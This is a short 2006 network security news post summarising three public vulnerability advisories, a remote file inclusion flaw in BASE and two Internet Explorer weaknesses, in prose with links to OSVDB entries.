Network Security News – Sunday, May 28, 2006 Events
Basic Analysis and Security Engine (BASE) BASE_path Variable Remote File Inclusion
Basic Analysis and Security Engine (BASE) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to "base_qry_common.php", "base_stat_common.php" and "includes/base_include.inc.php" not properly sanitizing user input supplied to the "BASE_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.. Read more at osvdb.org/25770
Microsoft IE Iframe Folder Delete Weakness
Microsoft IE contains a flaw that may allow a malicious user to trick users into performing certain actions on local resources. The issue is triggered when network shares are included in an iframe occurs. It is possible that the flaw may allow an attacker to trick users into performing certain actions on local folders and files resulting in a loss of confidentiality.. Read more at osvdb.org/23608
Microsoft IE window.status Memory Leak DoS
Microsoft IE contains a flaw that may allow a remote denial of service. The issue is triggered due to a memory leak when the victim accesses a URL that contains malicous code that calls the window.status function, and will result in loss of availability for the platform.. Read more at osvdb.org/23307
Leave a Reply